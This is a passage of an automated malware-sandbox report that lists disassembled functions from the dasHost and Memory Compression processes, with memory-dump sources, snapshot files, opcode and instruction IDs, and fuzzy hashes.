Opcode Fuzzy Hash: a4b6afa26df660950c3667ec86af235eb296937b9294607621260e9f6add7651
Instruction Fuzzy Hash: 7511CE31C0D64A9FEB88EB6888692B97BF0FF18744F0005BAD409C7992DF39A480C701

Function 00007FF848EA506D Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a679348361a740fbd0c099100919875f05554605d7445c6a516f5c38107b1063
Instruction ID: 9830753ceb58ea071b6c1e20a832dac3a4cffc29ac05125f709c2bba7147abc2
Opcode Fuzzy Hash: a679348361a740fbd0c099100919875f05554605d7445c6a516f5c38107b1063
Instruction Fuzzy Hash: 61119E31D0DA4E9FEB48FF6484A96B97BA0FF1A741F0005BAD419C2192DF34A544C781

Function 00007FF848E9C1F5 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997dc5c917996997a291f32f87b9f29819fa29525c69d137f1ab5423fb5da537
Instruction ID: dcb0131da72299f281b5d214d345abef7fabc4f6da8978e9e8d752cf8c9deb8b
Opcode Fuzzy Hash: 997dc5c917996997a291f32f87b9f29819fa29525c69d137f1ab5423fb5da537
Instruction Fuzzy Hash: 82118EB091CA8D8FEB48FFA488592BD7BA0FF19345F4004BAD819C3191DF74A540C744

Function 00007FF848E9BE05 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5135731a3f10f17fee1f49d5aec8df12c78c6201a2b78a139bcb6295448ccf45
Instruction ID: eae44013806b31ef7686c828993c6762e8fbaa8c12e0c285bd7e0a3a98b5ff5e
Opcode Fuzzy Hash: 5135731a3f10f17fee1f49d5aec8df12c78c6201a2b78a139bcb6295448ccf45
Instruction Fuzzy Hash: 1A118B3090DA5D8FEB88FF6888992BD7BA1FF58345F0004BAD409C61A2DF74A550C740

Function 00007FF848EA6FAD Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3e0dc6909f626b7e456c653146d3cf408876501de5d5a5aba635e971deaf0c
Instruction ID: bd710ec35a430f9b47fddd03c7c96e8ca536c8038af2bb0c89dfd831f73bd419
Opcode Fuzzy Hash: da3e0dc6909f626b7e456c653146d3cf408876501de5d5a5aba635e971deaf0c
Instruction Fuzzy Hash: 3E119E3190D64E8FEB58FF2888A92B97BA0FF5A340F0445BAD409C71A2DF38A454C751

Function 00007FF848E92ED1 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b951b3a8487b2b7b5f1aaed80bc2f4af749c9be18d0a602f472ac6d3b92265c
Instruction ID: b3837a8d887df018d322adc2d2c1247d4de7fa620998ac320e10db9321ce8b7e
Opcode Fuzzy Hash: 0b951b3a8487b2b7b5f1aaed80bc2f4af749c9be18d0a602f472ac6d3b92265c
Instruction Fuzzy Hash: 8101BC30D1C64D8FEB51FB6488486A97BE0FF19389F4109B6D418C70A7EF78E0448704

Function 00007FF848E93595 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b8ee4ff81e24a2d94062356fc0cfe173fc85653e338ebe5e232501b5afcd94
Instruction ID: 26bcf1327f830483ddb9fdd073b4ab04f1c7f15c988419e3d29fc64d99d665af
Opcode Fuzzy Hash: a5b8ee4ff81e24a2d94062356fc0cfe173fc85653e338ebe5e232501b5afcd94
Instruction Fuzzy Hash: FA11797090D68A8FEB88EBA8C8592BD7BE0FF18349F0005BAD429C71A2DF74A5408700

Function 00007FF848E905D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c65837785186fd6d64689d2958cc6a5603de7b68bdd4c431c22f18f42597f4c
Instruction ID: bccf9ce3f88b592f31730680bda8b03b0849da3a9454210e675ea711035fbc52
Opcode Fuzzy Hash: 5c65837785186fd6d64689d2958cc6a5603de7b68bdd4c431c22f18f42597f4c
Instruction Fuzzy Hash: 21018C30A0C90E9FEB48EFA4C4456B977A1FF58389F5044BED40EC2181CF7AA550CB44

Function 00007FF848EA7C29 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61986ab5b55fe6b7f4e742050ccb25303301c4223fa49aaaee264c918326d52d
Instruction ID: 4ca931b848b43d6ed6f92f5912c17345f454b86a0f75474d7ba1f21d25fdfe36
Opcode Fuzzy Hash: 61986ab5b55fe6b7f4e742050ccb25303301c4223fa49aaaee264c918326d52d
Instruction Fuzzy Hash: 73018C3094D789AFDB49EB2488A92B97BB0FF19745F0104FAD449C61A2DF39A540C741

Function 00007FF848E9AC95 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c1e2982bee94d269286e87c3fb4e2f41b3fba264a3a4e235611c174e87dabe
Instruction ID: f45585871a760cd829306c93c41badafa437a3934939b5fd75e9cedc50931710
Opcode Fuzzy Hash: 29c1e2982bee94d269286e87c3fb4e2f41b3fba264a3a4e235611c174e87dabe
Instruction Fuzzy Hash: BC018636A4E7866FD312E768D8D14E93770FF81354B0946F3D048CB0A3EA2CA4498765

Function 00007FF848EA7C9D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4449ccd653fcf0b2e09724ce03eb3db74380283bde306e764cd89a5eb0d5c5e3
Instruction ID: b70b8f822cf058bf5178ca2f008559e7595420864aa127cfd60f6910ed4c7638
Opcode Fuzzy Hash: 4449ccd653fcf0b2e09724ce03eb3db74380283bde306e764cd89a5eb0d5c5e3
Instruction Fuzzy Hash: 6501DA3190D64AAFEB48EF24C8596BA7BA0FF19781F0104BAD40AC6192EF38A540C700

Function 00007FF848EA7679 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28cad1a0faec4153865248bf3e45041bd8e732fc59689c07f6030c54ff4b376b
Instruction ID: 3881e7906eff1ae7c280a18259c53b0cac7e4cb7a8ef33fd6d66123276099862
Opcode Fuzzy Hash: 28cad1a0faec4153865248bf3e45041bd8e732fc59689c07f6030c54ff4b376b
Instruction Fuzzy Hash: 5001713095D78A5FE752FB3888492A97BF4FF9A781F0504F6D058C70A2DF38A4448715

Function 00007FF848E91CA5 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94352bd7f074b2ec5d89ca07bf3a16b324ebeffde4ccd03e145277c89ecd8069
Instruction ID: bafd3c9ba706ab01fc35a68745bef4daef388337743427566bf13fba294c21e5
Opcode Fuzzy Hash: 94352bd7f074b2ec5d89ca07bf3a16b324ebeffde4ccd03e145277c89ecd8069
Instruction Fuzzy Hash: 6201A470D0D68E8FEB58EF6488592B97BA0FF55345F5005BEE808C2192DBBA9950C744

Function 00007FF848E92F49 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487ea4ebedb8b377ef414671d9f048a567fba8dc9c26fbf2978b18e8ec8faa9f
Instruction ID: d960d5832b7e4d18e8e3d6d962fdefa4cc2b73fe23a835f4fdea7a0ac7a1204f
Opcode Fuzzy Hash: 487ea4ebedb8b377ef414671d9f048a567fba8dc9c26fbf2978b18e8ec8faa9f
Instruction Fuzzy Hash: E0019A3090D6898FEB52BB7488486A97BA0FF5A344F0605F2D418CA0ABEA78A4448301

Function 00007FF848E928AD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2140d3f2c4dfd4a634fddfd0f7ea86e36fb2f8046cb199bfebbbba8ed3743b
Instruction ID: 11e06326c387ea41ca6e4672dfd00614c0a7f6ede249436f2e2957fe1a7a0f25
Opcode Fuzzy Hash: 9f2140d3f2c4dfd4a634fddfd0f7ea86e36fb2f8046cb199bfebbbba8ed3743b
Instruction Fuzzy Hash: DF01DB3095D64D9FEB51FBA488486B97BF0FF1A344F4205B2D418C70A2EF38E5848704

Function 00007FF848EA2CAA Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5d3fab7c76b365897d18e758eec93e380eacb27562249378b201f5ec879358
Instruction ID: b167f727aed1e9b986ef25587e9aa739dad64dfb09da8a6b9c77e96237085572
Opcode Fuzzy Hash: bd5d3fab7c76b365897d18e758eec93e380eacb27562249378b201f5ec879358
Instruction Fuzzy Hash: D1013971E0C6099FEB18EFA8C4445FCBAF1FB48791F50403AD00AB7296DB3829448B18

Function 00007FF848E9AC29 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846d0bfe60651853ccbca03c2574e7637e2b9862ce80fa5895b1f36c6647498a
Instruction ID: 83f7b529d7c6e0266d69a479f878d2bc4cc01d43abd44b374c204187496b9234
Opcode Fuzzy Hash: 846d0bfe60651853ccbca03c2574e7637e2b9862ce80fa5895b1f36c6647498a
Instruction Fuzzy Hash: F5018F3094E68A6FE752FB7488591A97BF0FF0A344F0509F7D408CB0A2EF78A4849701

Function 00007FF848E90610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e366e54e66c283b8ad8b4bde6e96ab143279080ba91cab0f485ce7e69f4b548
Instruction ID: db1fc7144bc28024e08f047b29d744fc0bf855254f3378b3414f97474ad86edc
Opcode Fuzzy Hash: 6e366e54e66c283b8ad8b4bde6e96ab143279080ba91cab0f485ce7e69f4b548
Instruction Fuzzy Hash: 4601693091990E9EEF68FBA484496BD73A0FF19349F1108BEE42EC21D2DF79A550C604

Function 00007FF848E90608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d1d7b9d1415c591364347bc9fb5b8bdc451744ac230e33a16b5d84b5d8723f
Instruction ID: 5c5bb857e9ad9079c3dab933badc7090f7bebdfbd13bb41da502d48e6ce9bc0b
Opcode Fuzzy Hash: 04d1d7b9d1415c591364347bc9fb5b8bdc451744ac230e33a16b5d84b5d8723f
Instruction Fuzzy Hash: 3501693091990E9EEF69FF6484492B972A0FF18389F1108BEE42EC61D2DF79A150C654

Function 00007FF848E91140 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ae7e9936737b786212676098399e08502d005b54fa662bfbd4317e37f121f2a
Instruction ID: 923eb8c9f996222cda96794e73aec3604f98c01413f0bef40c8256c1cf5ac872
Opcode Fuzzy Hash: 4ae7e9936737b786212676098399e08502d005b54fa662bfbd4317e37f121f2a
Instruction Fuzzy Hash: 40F0AF70D1CA1E9EFB99BAAA98183FA77E0FF563D9F0001BAD819C20C1EF7911148645

Function 00007FF848E9ACA8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41debe2185377575ac542e54a8640c1a1a68747c834a4f41075fd6dac5e150a
Instruction ID: f964d4163f54d90030ae8a9576106925186cf6786efd8e2511aafb2fb2b147c0
Opcode Fuzzy Hash: a41debe2185377575ac542e54a8640c1a1a68747c834a4f41075fd6dac5e150a
Instruction Fuzzy Hash: 5CF03036A4D5176FE611F65CE8D14FA73A5FF80369B088B73D04D8B057EE68A04846A8

Function 00007FF848E905D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a180d28ff55259aa24498315c99ecb50176e61ea8d62c38f6d0afd0b572bc5f
Instruction ID: 4fcb40ddcbe879484410623d0a8cc4f2b0e23c96e61c33ea913dbe385e501d1c
Opcode Fuzzy Hash: 1a180d28ff55259aa24498315c99ecb50176e61ea8d62c38f6d0afd0b572bc5f
Instruction Fuzzy Hash: 65F0C23091D54E9FEB48EEA484052FA77A4FF05349F50047AE80DC2181CB7AA950CB48

Function 00007FF848E927C9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d84d5c5303a9d7e28998bb13656aa8e6e1a7466c4301298c515c6ea0465036f
Instruction ID: 3ab8c1ec640127cecc47acdbd97585ac8f024b716bced0901726961e3bb29b64
Opcode Fuzzy Hash: 2d84d5c5303a9d7e28998bb13656aa8e6e1a7466c4301298c515c6ea0465036f
Instruction Fuzzy Hash: 0EF0AF3180E7898FEB6AAF2088191A93BB0FF06245F0604BAD419CA0D3DB789854C341

Function 00007FF848E9283D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3a7b18bc2f9f6d7a84cc167e84399b6d101c816fe01afa124b69bfcc2a09e7
Instruction ID: d75f68f5cbfed94b23915f02dbc134f3d425c5fc9488d3eb280966997782aa5b
Opcode Fuzzy Hash: bd3a7b18bc2f9f6d7a84cc167e84399b6d101c816fe01afa124b69bfcc2a09e7
Instruction Fuzzy Hash: FCF0B43091E7898FEF69AF6484592B97BA0FF16345F4604BED819C61D2DB78A454C700

Function 00007FF848EA2C7D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction ID: ce91ab0c6a8dfe010280111dce1a0f8be497f825575306626ac068cd87f2ea7e
Opcode Fuzzy Hash: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction Fuzzy Hash: EAF0D471A0860D8FEB54FB94C485AECB3E1FB58344F60017AC00AE7292CF786940CB48

Function 00007FF848EA54FB Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ac6a015b9a4180cbb9f3d7ca3511ee7b53a10d4dbc31c5fdda316135b7a3ae
Instruction ID: efc8a9bf59503fe4dc07c5b82e808ac90f68c77dc12fcf4cb05078e951cfd52d
Opcode Fuzzy Hash: 76ac6a015b9a4180cbb9f3d7ca3511ee7b53a10d4dbc31c5fdda316135b7a3ae
Instruction Fuzzy Hash: 5CD012B1D1CE198FE784FF58548D3A8B7E1FB58644F40442AC008D3181DF3158015754

Non-executed Functions

Function 00007FF848EA14B4 Relevance: 7.6, Strings: 6, Instructions: 76COMMON

Download Yara Rule

Strings

., xrefs: 00007FF848EA1531
, xrefs: 00007FF848EA14E6
+, xrefs: 00007FF848EA11EE
{, xrefs: 00007FF848EA11E1
/, xrefs: 00007FF848EA1AA5
/, xrefs: 00007FF848EA1B03

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID: $+$.$/$/${
API String ID: 0-3160744145
Opcode ID: 7530918a15830a2246d7579d4cf94a97c100dd1498990452f84d24d5f8eae8a1
Instruction ID: 7e47374cbe55d2751c7b1caae427229eb19a91197986746e6fdc7d1a483a5396
Opcode Fuzzy Hash: 7530918a15830a2246d7579d4cf94a97c100dd1498990452f84d24d5f8eae8a1
Instruction Fuzzy Hash: 6331AFB0D0872A8FEB68DF54D9547EDB7B1BB48741F1044AAC00AAA280CB795A84CF48

Function 00007FF848E9F6C5 Relevance: 6.3, Strings: 5, Instructions: 54COMMON

Download Yara Rule

Strings

B, xrefs: 00007FF848E9F76F
], xrefs: 00007FF848E9F6FC
[, xrefs: 00007FF848E9F766
k, xrefs: 00007FF848E9FF0D
M, xrefs: 00007FF848E9F731

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9f000_dasHost.jbxd

Similarity

API ID:
String ID: B$M$[$]$k
API String ID: 0-4258210364
Opcode ID: 878ed7812e896b9e84a1b51c58ca43b850f58a9df0a34dfe6ceacadd787eefd2
Instruction ID: c1f2b36b57939c25f92ff8b5275280e84028e3d29771fb5db827f0c648563113
Opcode Fuzzy Hash: 878ed7812e896b9e84a1b51c58ca43b850f58a9df0a34dfe6ceacadd787eefd2
Instruction Fuzzy Hash: F5212970E1962ACFEB68DF10C8807FAB7B1FB55745F0081A9D40997281DBB85A84CF45

Analysis Process: Memory Compression.exePID: 1200, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848E8F0A6 Relevance: 7.6, Strings: 6, Instructions: 97COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848E8F0C8
Y, xrefs: 00007FF848E8F949
k, xrefs: 00007FF848E8FF0D
\, xrefs: 00007FF848E8F0BB
%, xrefs: 00007FF848E8F971
8, xrefs: 00007FF848E8F633

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E8F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E8F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e8f000_Memory Compression.jbxd

Similarity

API ID:
String ID: %$8$Y$\$_$k
API String ID: 0-2256862889
Opcode ID: c17aba2d4533d96f20c33c453070d90bca6627168075a1e48ad2de3b24581cd7
Instruction ID: e6bf77d2f72165d84561f0288fc359b0ae84ca99adbfc4c2515df73cb6126c81
Opcode Fuzzy Hash: c17aba2d4533d96f20c33c453070d90bca6627168075a1e48ad2de3b24581cd7
Instruction Fuzzy Hash: 7941B270D0866A8FEB68EF14C8987EDB7B1BF55345F5041EAD40EA7291CB382A84CF54

Function 00007FF848E8FC9E Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

'W_H, xrefs: 00007FF848E8FCCF

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E8F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E8F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e8f000_Memory Compression.jbxd

Similarity

API ID:
String ID: 'W_H
API String ID: 0-813103255
Opcode ID: 8be240a7531e2b17f43ba297170ab6cf74d4f03d8ca9780e2b997a5fb1cd8983
Instruction ID: 467246427e95abe5ed5e9547c5758bec4a2671e504f34e32829948ee644e5844
Opcode Fuzzy Hash: 8be240a7531e2b17f43ba297170ab6cf74d4f03d8ca9780e2b997a5fb1cd8983
Instruction Fuzzy Hash: CE21F9B1D18A599FDBA8EF2888557A8B7E1FF54341F5040FAC50DE3282DE346A818F19

Function 00007FF848E91AE1 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848E91AA5

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: c8a035a4687ecad3a9bc84a92d14fad2e07116126750b393166f02871e02cdf2
Instruction ID: f2cb264bb7aa0d4aaea12fad3dbe5456073ca421242392292357ffc13d6cccc1
Opcode Fuzzy Hash: c8a035a4687ecad3a9bc84a92d14fad2e07116126750b393166f02871e02cdf2
Instruction Fuzzy Hash: 37F03430D093098FEB15EF94C9507EDB3F1FB10355F140226C0099B294DBB9AA84CB48

Function 00007FF848E91649 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848E91AA5

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 21d5768a268721ffa60d97ab409e0b3bb5310d3fb029bbac3534de2f02b8c5fb
Instruction ID: 1e170c28c28058338071c33042294b9ff04668b03fc8c8c32eb36acac0e0d758
Opcode Fuzzy Hash: 21d5768a268721ffa60d97ab409e0b3bb5310d3fb029bbac3534de2f02b8c5fb
Instruction Fuzzy Hash: C5E09A30A0930DCFEB14EF94C9506ED73F1FB64311F140226C009DB294EBB8AA40CB84

Function 00007FF848E934D8 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f49e76f0dc9cfaaeef800342b817ffc0981843115bb19bdba060d44a75ebdcb6
Instruction ID: c67dfc4a7b2011cdd17fe09f8f0c6b630cb62df6d013b94a185c66a23beaec61
Opcode Fuzzy Hash: f49e76f0dc9cfaaeef800342b817ffc0981843115bb19bdba060d44a75ebdcb6
Instruction Fuzzy Hash: A4219021D0E6C99FE762F77898591A97FB0FF06744F0A04FBC048CB0A3DA68A544C352

Function 00007FF848E8DA99 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e8a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b0a92d4cfa7114d25148d77381ff16d0d906a63c3c8731bbbfc26118f2bf68
Instruction ID: 8e6bd6f3362a9c9d8cd971f358662acb3cb9cb3daa5d1efaf30e9b51e9f88938
Opcode Fuzzy Hash: 71b0a92d4cfa7114d25148d77381ff16d0d906a63c3c8731bbbfc26118f2bf68
Instruction Fuzzy Hash: 06E14C31E19A599FEB98EB68D4957BCB7B1FF58340F4441BAD00DD3292CB38A880CB55

Function 00007FF848E81698 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e849b61f19a90ef1d69b12c4ad01b30a4028205dabe496e54821e2e41e580c3
Instruction ID: a9d3c770e67abda486b656848f837e04e0d3e07190d436337d8546db483b9dd8
Opcode Fuzzy Hash: 4e849b61f19a90ef1d69b12c4ad01b30a4028205dabe496e54821e2e41e580c3
Instruction Fuzzy Hash: F9819C31A0CA8A8FDB59EE1C88556BD77E2FF98740F5441BAE44DC3286CF35AC028785

Function 00007FF848E92AA1 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

